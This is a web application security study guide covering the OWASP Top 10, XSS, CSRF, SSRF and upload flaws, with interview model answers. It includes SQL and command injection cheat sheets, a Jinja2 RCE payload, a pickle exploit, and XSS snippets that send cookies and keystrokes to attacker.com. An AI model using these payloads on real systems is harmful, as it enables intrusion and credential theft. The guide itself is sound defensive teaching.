Security Notes
Web & AI Security

Web Application Security Deep Dive

19 min read 11 sections 10 model answers

Breadth layernotes-security-core-knowledge.md


OWASP Top 10 Web (2021) — Detailed

A01: Broken Access Control

The #1 vulnerability. Access control enforces that users can only act within their intended permissions.

Common failures

  • IDOR (Insecure Direct Object Reference) — GET /api/orders/1234 returns data even when logged in as a different user
  • Missing function-level access control — admin endpoints accessible by non-admins if URL is known
  • Privilege escalation — regular user modifies their role by changing a request parameter
  • CORS misconfiguration — Access-Control-Allow-Origin reflects any origin
  • JWT with tampered role claim accepted without verification

Exploitation example (IDOR)

http
# Victim's order
GET /api/orders/5678 HTTP/1.1
Authorization: Bearer <attacker_token>

# If server returns 5678's data to attacker → IDOR

Mitigations

  • Server-side authorisation on every request — never trust client-supplied IDs without verifying ownership
  • Use indirect references (map session-specific IDs to real IDs server-side)
  • Log access control failures; alert on repeated failures
Memory hook

authn vs authz, and why access control is #1. Authentication = "are you who you say?" (the bouncer checks your ID). Authorization = "are you allowed in this room?" (the bouncer checks your VIP wristband). IDOR is an authorization failure: you're logged in (authenticated) but the server forgets to check the resource is yours. The reason Broken Access Control rose to #1 in OWASP 2021: authentication is mostly solved by libraries, but authorization is per-object business logic the developer must write on every endpoint — and they forget. Mnemonic: authenti-N = who, authori-Z = what.


A02: Cryptographic Failures

Previously called "Sensitive Data Exposure" — it's really about cryptographic failures that lead to exposure.

Common failures

FailureExample
Data transmitted in cleartextHTTP instead of HTTPS; FTP for file transfer
Weak algorithmsMD5/SHA-1 for password hashing; DES/RC4 for encryption
Hardcoded keysSECRET_KEY = "mysecret" in source code
Improper key storagePrivate keys in the repo; keys in env vars logged to stdout
Weak random number generationrand() for session tokens
No forward secrecyRSA key exchange without ECDHE

Test for it

bash
# Check TLS configuration
testssl.sh https://target.com

# Check for hardcoded secrets
trufflehog filesystem ./repo
gitleaks detect --source=./repo

A03: Injection

Any interpreter that processes attacker-controlled data as code.

SQL Injection cheat sheet

sql
-- Comment out rest of query
' --
' #
' /*

-- Always-true condition (authentication bypass)
' OR '1'='1' --
' OR 1=1 --

-- Union-based extraction (find column count first)
' ORDER BY 1 --    (increment until error)
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT username,password,NULL FROM users --

-- Blind boolean (infer data character by character)
' AND SUBSTRING(username,1,1)='a' --

-- Time-based blind
'; IF(1=1) WAITFOR DELAY '0:0:5' --   (MSSQL)
' AND SLEEP(5) --                      (MySQL)

OS Command Injection

bash
# In user input that reaches shell exec
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | id
`id`
$(id)

# Blind — use out-of-band (DNS/HTTP)
127.0.0.1; curl http://attacker.com/$(id)

LDAP Injection*)(uid=*))(|(uid=* — bypass LDAP authentication filters

Memory hook

all injection is one bugSQLi, command injection, LDAP injection, SSTI, XSS — they're the same root cause wearing different clothes: data crosses a boundary and gets treated as code because it wasn't separated from the instructions. The universal fix is also one idea: keep code and data in separate channels. For SQL that's parameterised queries (the query structure is fixed; data goes in typed placeholders the engine never parses as SQL). String concatenation fails precisely because it merges the channels, letting a ' end the data and start new code. If you can articulate "injection = confusing data for code, fixed by separating the two," you've answered half the AppSec interview.

Template Injection (SSTI)

# Test string — if rendered, SSTI exists
{{7*7}} → 49 (Jinja2, Twig)
${7*7} → 49 (Freemarker, EL)
<%= 7*7 %> → 49 (ERB)

# Jinja2 RCE
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }}

A05: Security Misconfiguration

Broad category: anything that's left in an insecure default state.

Common findings

  • Default credentials (admin/admin, admin/password) on admin panels, databases, routers
  • Verbose error messages exposing stack traces, file paths, DB schema
  • Directory listing enabled on web servers
  • Unnecessary HTTP methods enabled (TRACE, DELETE, PUT)
  • Missing security headers (CSP, HSTS, X-Frame-Options)
  • Cloud storage buckets with public read/write
  • Debug mode enabled in production (Django DEBUG=True, Flask debug server)
  • Open admin interfaces (/admin, /phpmyadmin, /_admin) accessible from internet

Quick check

bash
# Find admin panels and sensitive paths
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Check HTTP methods
curl -X OPTIONS https://target.com -v

# Check security headers
curl -I https://target.com

A08: Software and Data Integrity Failures

Encompasses insecure deserialisation and CI/CD integrity.

Insecure deserialisation

Java:

bash
# ysoserial generates serialised payloads for common gadget chains
java -jar ysoserial.jar CommonsCollections1 'id' | base64

Python pickle:

python
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())
# Any system that does pickle.loads(user_input) executes os.system('id')

PHP unserialise:

  • PHP magic methods __wakeup(), __destruct() called on deserialisation
  • If a gadget chain exists in loaded classes, arbitrary code execution follows

MitigationsUse JSON (no code execution). If you must serialise: sign the payload (HMAC) before storing/transmitting; verify before deserialising. Never deserialise untrusted data in Java, PHP, Python pickle.


XSS — Deep Dive

Contexts and Encoding

Memory hook

the three XSS typesStored = the payload lives in the database and hits every viewer (a malicious comment) — most dangerous, "persistent." Reflected = the payload bounces straight back off one request and needs the victim to click a crafted link (search box echoing your query) — "non-persistent." DOM-based = the payload never reaches the server at all; client-side JavaScript reads it from the URL/fragment and writes it into the page. Mnemonic: Stored stays, Reflected rebounds, DOM is decided in the browser. The mitigation differs only in where you encode: server-side output encoding for stored/reflected, safe DOM APIs (textContent, not innerHTML) for DOM-based.

XSS depends on where the output lands — different contexts need different encodings:

ContextExample sinkRequired encoding
HTML body<div>USER_INPUT</div>HTML entity encode (&, <, >, ", ')
HTML attribute<input value="USER_INPUT">HTML attribute encode
JavaScript stringvar x = "USER_INPUT"JS string escape (\, ", ', newlines)
URL parameter<a href="/search?q=USER_INPUT">URL encode
CSSstyle="color: USER_INPUT"CSS encode

DOM-based sinks (JavaScript processes input without server involvement):

javascript
// Dangerous sinks
document.innerHTML = userInput;   // HTML parsed and executed
document.write(userInput);
eval(userInput);
setTimeout(userInput, 1000);
location.href = userInput;        // javascript: URI

// Safe alternatives
element.textContent = userInput;  // text only, never parsed as HTML

CSP as XSS Defence

Content Security Policy tells the browser which sources of scripts are trusted:

http
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.trusted.com; object-src 'none'
  • 'nonce-{random}' — allow specific inline scripts with a per-request nonce
  • 'strict-dynamic' — trust scripts loaded by trusted scripts
  • unsafe-inline — negates most XSS protection; avoid
  • Use CSP Evaluator to test policies

XSS Impact

javascript
// Session theft (works if no HttpOnly)
fetch('https://attacker.com/steal?c=' + document.cookie)

// Credential phishing overlay
document.body.innerHTML = '<form action="https://attacker.com">...'

// Keylogger
document.addEventListener('keydown', e => { fetch('https://attacker.com/k?k=' + e.key) })

// BeEF hook — full browser control
<script src="https://attacker.com/hook.js"></script>

CSRF — Mechanisms and Mitigations

How It Works

  1. Victim is authenticated to bank.com (session cookie is set)
  2. Victim visits evil.com which has: <img src="https://bank.com/transfer?to=attacker&amount=1000">
  3. Browser automatically sends the request with bank.com's session cookie
  4. Transfer executes — victim never knew
Memory hook

CSRF is the "confused deputy." The browser is a deputy that automatically attaches your bank cookie to any request to bank.com — even one triggered by evil.com. The attacker doesn't steal the cookie (that's XSS); they just get the browser to fire a request that rides on it. This is why HTTPS doesn't help — the forged request is perfectly encrypted and valid; the problem is it was initiated cross-site. SameSite cookies fix it at the root by telling the browser "don't attach this cookie to cross-site requests at all." Mnemonic: XSS steals the cookie, CSRF rides the cookie.

Works forGET requests that modify state. POST CSRF requires a form on the attacker's page:

html
<form id="csrf" action="https://bank.com/transfer" method="POST">
  <input name="to" value="attacker">
  <input name="amount" value="1000">
</form>
<script>document.getElementById('csrf').submit()</script>

Mitigations Compared

MethodHow it worksEffectiveness
SameSite=StrictBrowser won't send cookie with any cross-site requestStrong; breaks some OAuth flows
SameSite=LaxCookie sent with top-level navigation GET, not sub-resourcesGood default; doesn't protect same-site subdomains
CSRF token (synchroniser)Server generates random token per session; form must include itStrong if tokens are unpredictable and validated
Double-submit cookieToken in cookie and header/body; server checks they matchWeaker if attacker can set cookies (subdomain takeover)
Custom request headerX-Requested-With: XMLHttpRequest requires CORS preflightGood for APIs; not for forms
Origin / Referer checkReject requests from unexpected originsFragile; some proxies strip headers

Authentication and Session Vulnerabilities

Session Management

Session fixation

attacker sets the victim's session ID before login; after login the attacker reuses it. Mitigation: regenerate session ID on login (session_regenerate_id()).

Session prediction

sequential or guessable session IDs (SESS0001, SESS0002). Use CSPRNG with 128+ bits of entropy.

Session expiry

long-lived sessions increase exposure window. Absolute timeout (e.g. 8h) + idle timeout (e.g. 30 min).

Concurrent sessions

allow or deny? Alert on sessions from two different countries simultaneously.

Password Reset Flaws

Predictable token

?token=base64(username+timestamp) — attacker can generate their own

Token in URL

logged by servers, proxies, browser history; use POST body or fragment

Long token lifetime

tokens valid for hours/days; short-lived (15 min) is better

Username enumeration via error messages

"user not found" vs "reset email sent" reveals valid accounts

Timing Attacks on Authentication

python
# Vulnerable — early exit reveals whether username exists
if user not in database:
    return "Invalid credentials"   # returns faster than if password check runs
if not check_password(password, hash):
    return "Invalid credentials"   # takes longer

# Safe — always run both checks
user = get_user_or_dummy(username)   # always return a user object (with dummy hash if not found)
password_ok = check_password(password, user.hash)
if not user.exists or not password_ok:
    return "Invalid credentials"

API Security

REST API Security

# Common mistakes
GET /api/v1/users/1234/profile   # IDOR — change 1234 to someone else's ID
GET /api/v1/admin/users          # Function-level access control missing
GET /api/v1/products?debug=true  # Debug parameter left in production
POST /api/v1/login               # No rate limiting → brute force

# Mass assignment
PATCH /api/v1/user/profile
{"name": "Bob", "role": "admin"}   # If server blindly applies all fields

GraphQL Security

graphql
# Introspection — discover full schema
{ __schema { types { name fields { name } } } }

# Batching DoS — one HTTP request, thousands of operations
[{"query": "{ expensiveOperation }"}, {"query": "..."}, ...]  # repeat 1000 times

# Excessive data exposure — query nested fields until you hit interesting data
{ user(id: 1) { friendsList { email phoneNumber socialSecurityNumber } } }

# Mitigation: disable introspection in production, depth limiting, query cost analysis

HTTP Security Headers Reference

nginx
# Nginx hardened headers config
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" always;
add_header X-Frame-Options "DENY" always;
add_header X-Content-Type-Options "nosniff" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Permissions-Policy "geolocation=(), camera=(), microphone=()" always;
add_header Cross-Origin-Opener-Policy "same-origin" always;
add_header Cross-Origin-Resource-Policy "same-origin" always;
# Remove information-leaking headers
more_clear_headers Server;
more_clear_headers X-Powered-By;
HeaderMax protection settingNotes
HSTSmax-age=31536000; includeSubDomains; preloadSubmit to browser preload list for best protection
CSPStart with default-src 'self', tighten incrementallyUse report-uri first to see what breaks
X-Frame-OptionsDENYSuperseded by CSP frame-ancestors but still needed for IE
X-Content-Type-OptionsnosniffNo version/value variation
Referrer-Policystrict-origin-when-cross-originPreserves referrer for same-origin, strips path for cross-origin

Business Logic Vulnerabilities

Logic flaws that scanners can't find — require understanding the application's intended behaviour.

Examples

Price manipulation

negative quantities or overflowed values in shopping cart

Race conditions

two requests processed simultaneously spend the same voucher twice, or overdraw an account

Workflow bypass

skip payment step by going directly to /order/confirm

Mass assignment

PATCH request with extra fields sets unintended attributes (e.g. "isAdmin": true)

Privilege escalation via parameter

?as_user=admin or accountId=1 in API body

Referral abuse

create circular referral loop; earn infinite credit

Race condition example (TOCTOU)

Thread 1: Check balance (100) → OK
Thread 2: Check balance (100) → OK
Thread 1: Deduct 100 → balance = 0
Thread 2: Deduct 100 → balance = -100  (should have been blocked)

Mitigation: database-level locking (SELECT FOR UPDATE), atomic compare-and-swap, idempotency keys.


File Upload Vulnerabilities

Allowing user file uploads is a significant attack surface.

Attack vectors

  • Upload .php / .jsp / .aspx shell — execute code on the server
  • Upload SVG with <script> — stored XSS when viewed in browser
  • Upload HTML — phishing page hosted on trusted domain
  • Path traversal in filename — ../../etc/passwd (if filename used in path)
  • Zip bomb / billion laughs — DoS via decompression

Bypass techniques for extension filters

  • Double extension: evil.php.jpg (old Apache configs parse both)
  • Case variation: evil.PHP, evil.pHp
  • Null byte: evil.php%00.jpg (older PHP versions truncate at null)
  • Content-type spoofing: send image/jpeg in Content-Type but upload PHP
  • Alternate extensions: .php5, .phtml, .phar

Mitigations

python
import magic  # python-magic (libmagic bindings)

ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/gif'}

def validate_upload(file_bytes, filename):
    # Check actual content, not extension or Content-Type header
    mime = magic.from_buffer(file_bytes[:2048], mime=True)
    if mime not in ALLOWED_MIME_TYPES:
        raise ValueError(f"Disallowed file type: {mime}")
    # Store with a random UUID filename, not user-supplied name
    # Store outside webroot so files can't be executed
    # Serve via CDN with a separate domain (no cookies, no execution)

SSRF — Server-Side Request Forgery

The server is tricked into making a request to a URL the attacker chooses. Because the server makes the request, it can reach places the attacker can't — internal services, cloud metadata, localhost admin panels.

# App fetches a user-supplied URL (image preview, webhook, PDF render, URL importer)
POST /import { "url": "https://example.com/feed.xml" }

# Attacker points it inward:
"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"   # AWS metadata → steal role creds
"url": "http://localhost:6379/"          # internal Redis
"url": "http://10.0.0.5:8080/admin"      # internal admin panel
"url": "file:///etc/passwd"              # local file via file:// scheme
Memory hook

SSRF turns the server into your proxy. The whole point: the firewall trusts the server, so a request from the server reaches the soft internal network the attacker can't touch directly. The crown jewel is almost always the cloud metadata endpoint 169.254.169.254 — on AWS IMDSv1 it hands out temporary IAM credentials to anyone who asks, which is how the 2019 Capital One breach exfiltrated data from S3. That single fact (SSRF → metadata → cloud creds) is the most-cited SSRF interview answer.

Mitigations

  • Allowlist destinations (scheme + host) — deny by default; never blocklist (DNS rebinding, redirects, and encodings defeat blocklists).
  • Block link-local/internal ranges (169.254.0.0/16, RFC 1918, localhost) after DNS resolution, and re-validate on every redirect.
  • Enforce IMDSv2 (requires a session token via PUT, which SSRF usually can't send) — and set hop limit to 1.
  • Disable unneeded URL schemes (file://, gopher://, dict://).

Web Cache Poisoning

Attackers manipulate the cache so that it stores and serves a malicious response to other users.

Mechanism

  1. Find an unkeyed input — a request header that affects the response but isn't part of the cache key (e.g. X-Forwarded-Host, X-Original-URL)
  2. Craft a request that uses the unkeyed input to inject malicious content into the response (e.g. a reflected XSS payload via a host header)
  3. The poisoned response is cached and served to other users

Example

http
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com

# If response reflects X-Forwarded-Host in a script src:
<script src="https://evil.com/analytics.js"></script>
# → cached → served to all users → XSS for everyone

MitigationsInclude all headers that affect the response in the cache key; treat X-Forwarded-* headers carefully; use Vary header to key caches on relevant headers.


Interview Questions

Q
Explain reflected, stored, and DOM-based XSS, and how to mitigate each.
Model answer

Stored XSS persists the payload server-side — in a comment or profile field — so it executes for every user who views it; it's the most dangerous. Reflected XSS bounces the payload straight back in the response to a single crafted request, so it needs the victim to click a malicious link. DOM-based XSS never involves the server's response — client-side JavaScript reads attacker-controlled input from the URL or fragment and writes it into the DOM unsafely. Mitigations share a core idea — encode output for its context — but differ in where: server-side output encoding plus a strong CSP for stored/reflected, and safe DOM APIs like textContent instead of innerHTML for DOM-based. CSP with nonces is a strong defense-in-depth layer across all three.

Q
An API returns user data — what authorization checks belong on every request?
Model answer

On every request the server must independently verify three things, never trusting client input: that the caller is authenticated (valid, unexpired session/token), that the caller is authorized for the specific object requested (object-level ownership — does this order actually belong to this user?), and that the caller is authorized for the action and function (function-level — is this user allowed to hit an admin endpoint?). The object-level check is the one developers forget, producing IDOR. I'd also reject any client-supplied fields that shouldn't be settable (mass-assignment guard), enforce the check server-side regardless of whether the UI hides the option, and log/alert on repeated authorization failures.

Q
What's the difference between authentication and authorization? Give a vulnerability in each.
Model answer

Authentication proves identity — who you are; authorization decides what you're allowed to do. An authentication vulnerability is something like credential stuffing or accepting an alg:none JWT, where the system is fooled about who the caller is. An authorization vulnerability is IDOR or missing function-level access control, where the caller is correctly identified but the system fails to check whether they're permitted to access a given resource or action. Mnemonic: authentication = who, authorization = what — and Broken Access Control (authorization) is OWASP's current #1 because it's per-object logic developers must write on every endpoint.

Q
How does CSRF work, why doesn't HTTPS prevent it, and what does SameSite=Strict do?
Model answer

CSRF abuses the browser's habit of automatically attaching a site's cookies to any request to that site, including ones triggered from another site. The attacker hosts a page that fires a state-changing request to the target — a form auto-submit or an image tag — and the victim's browser sends it with their valid session cookie, so it executes as them. HTTPS doesn't help because the forged request is perfectly valid and encrypted; the issue isn't interception, it's that the request was initiated cross-site. SameSite=Strict tells the browser never to attach the cookie to cross-site requests, cutting the attack at the root — though it can break legitimate cross-site navigation and some OAuth flows, which is why Lax is the common default, backed by CSRF tokens for state-changing actions.

Q
Explain SQL injection and parameterized queries. Why does string concatenation fail?
Model answer

SQL injection happens when user input is concatenated into a query string, so a crafted input like ' OR '1'='1 ends the intended data context and injects new SQL logic — the engine can't tell the attacker's quote from the developer's. Parameterized queries (prepared statements) fix it by sending the query structure and the data on separate channels: the database compiles the query with typed placeholders first, then binds the user data as pure values that are never parsed as SQL. Concatenation fails precisely because it merges code and data into one string before the database sees it, so the boundary the attacker exploits exists. It's the same root cause as all injection — confusing data for code — and the same fix — separate the two.

Q
What is SSRF and how would you prevent it in a service that accepts user-submitted URLs?
Model answer

SSRF tricks the server into making a request to an attacker-chosen URL, abusing the server's network position to reach internal services, localhost, or the cloud metadata endpoint at 169.254.169.254 — which on AWS IMDSv1 hands back temporary IAM credentials, exactly how Capital One was breached. To prevent it: allowlist permitted destinations rather than blocklisting (blocklists fall to DNS rebinding, redirects, and encoding tricks); resolve the DNS and then reject internal/link-local ranges, re-validating on every redirect; enforce IMDSv2 so the metadata endpoint requires a token SSRF can't supply; disable dangerous schemes like file:// and gopher://; and ideally make outbound fetches from an isolated egress proxy with no access to internal networks.

Q
What's a Content Security Policy and how does it reduce XSS risk?
Model answer

CSP is a response header that tells the browser which sources of scripts, styles, and other resources are allowed to load and execute, acting as a second line of defense if an XSS payload slips past output encoding. A good policy disallows inline scripts and only permits scripts from trusted origins or those carrying a per-request nonce, so an injected <script> simply won't run because it lacks the nonce and isn't from an allowed source. It doesn't replace encoding — it's defense-in-depth — and the common mistake that guts it is unsafe-inline. I'd roll it out in report-only mode first to find what breaks, then enforce, ideally with nonces plus strict-dynamic.

Q
Walk me through submitting a login form — what security controls belong at each step?
Model answer

The form should be served over HTTPS with a CSRF token and submitted via POST so credentials aren't in the URL. On arrival, the server rate-limits by account and IP to blunt brute force and password spraying, and uses constant-time logic so a missing username and a wrong password are indistinguishable to prevent user enumeration and timing attacks. The password is checked against a slow salted hash like Argon2id, never logged. On success, the server regenerates the session ID to prevent fixation, issues a cookie with HttpOnly, Secure, and SameSite, and ideally triggers MFA and checks the password against breach lists. Failures are logged and feed anomaly detection — impossible travel, many denials. Generic error messages throughout.

Q
What's insecure deserialization? Give a concrete Python example.
Model answer

Insecure deserialization is reconstructing objects from untrusted serialized data using a format that can execute code during the process. In Python, pickle is the classic case: a class can define __reduce__ to return a callable and arguments that run on load, so an attacker crafts a pickle whose __reduce__ returns (os.system, ('id',)), and any code calling pickle.loads() on attacker-controlled bytes executes that command — full RCE. The same class of bug exists in Java deserialization (ysoserial gadget chains) and PHP unserialize via magic methods. The fix is to never deserialize untrusted data with these formats — use JSON, which only produces inert data structures — and if a rich format is unavoidable, sign the payload with an HMAC and verify before deserializing.

Q
How would you test a REST API for IDOR?
Model answer

I'd authenticate as two separate users I control, then take a request that returns user A's resource — say GET /api/orders/1001 — and replay it with user A's token but user B's object ID, or with user B's token against user A's ID. If I get the other user's data back, that's IDOR. I'd test every object reference, including ones in the body, headers, and nested resources, and try enumerating sequential or guessable IDs. I'd also check that write operations enforce ownership, not just reads, and that switching from a high-privilege to a low-privilege account doesn't still allow access. Tools like Burp's Autorize automate the "replay with a different user's session" comparison. The fix is server-side object-level authorization on every request, ideally with unguessable identifiers as defense-in-depth.